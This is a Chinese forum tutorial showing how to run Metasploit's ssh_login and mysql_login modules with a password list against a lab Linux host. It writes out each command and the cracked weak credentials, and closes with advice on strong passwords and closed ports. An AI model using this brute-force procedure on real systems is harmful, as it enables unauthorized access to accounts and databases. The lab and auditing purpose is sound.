番外// x_al3r给了我版权并且让我写下去,
00x01
大致思路
|_____利用ssh_login模块
|_ _ _利用mysql_login模块
00x02
#所需准备
|_____Metasploit框架
|_ _ _Linux靶机一台
00x03
目标ip:192.168.1.127
目标系统:unix
##ssh_login
/*
启动metasploit框架:
msfconsole复制代码
*/
/*
搜索辅助模块---ssh_login
|___命令:
search ssh_login复制代码
|_ _ _得到exploit地址
auxiliary/scanner/ssh/ssh_login复制代码
1.png (349.28 KB, 下载次数: 38)
2016-9-5 14:01 上传
加载这个模块:
use auxiliary/scanner/ssh/ssh_login复制代码
查看所需要的选项:
show options复制代码
2.png (394.26 KB, 下载次数: 31)
2016-9-5 14:01 上传
只需要设置这三个参数即可
PASS_FILE // 加载密码字典
RHOSTS // 目标ip地址
USERNAME // 指定一个账户
开始设置
set PASS_FILE /root/pass.txt复制代码
set RHOSTS 192.168.1.127复制代码
set USERNAME msfadmin复制代码
file:///C:\Users\lenovo\AppData\Local\Temp\ksohtml\wps61BB.tmp.jpg
3.png (87.53 KB, 下载次数: 44)
2016-9-5 14:01 上传
设置完毕,我们输如
exploit复制代码开始进行审计
4.png (380.39 KB, 下载次数: 35)
2016-9-5 14:01 上传
得出密码:msfadmin
总结/**
1:工具简单实用,可以支持大批量检测
2:觉得速度偏慢可以设置线程数
*/
*/
#mysql_login
/*
我们先搜索mysql_login模块
命令:
search mysql_login复制代码
其实我们可以直接从上面的搜索结果中加载 //把ssh替换成mysql即可
Exploit地址:
auxiliary/scanner/mysql/mysql_login复制代码
5.png (187.53 KB, 下载次数: 34)
2016-9-5 14:01 上传
使用use命令加载模块
查看所需要的选项:
show options复制代码
6.png (386.88 KB, 下载次数: 33)
2016-9-5 14:01 上传
只需要设置这三个参数即可
PASS_FILE // 加载密码字典
RHOSTS // 目标ip地址
USERNAME // 指定一个账户
开始设置
set PASS_FILE /root/pass.txt复制代码
set RHOSTS 192.168.1.127复制代码
set USERNAME root复制代码
7.png (82.3 KB, 下载次数: 42)
2016-9-5 14:01 上传
设置完毕,使用
exploit复制代码进行审计mysql弱口令
8.png (468.47 KB, 下载次数: 36)
2016-9-5 14:01 上传
得出结果:root/root
/**
总结:工具简单实用,速度较快,也支持大批量审计
*/
*/
//防护建议:
1:使用强密码
2:敏感端口不支持外连如3306,1433,3389,22,23等端口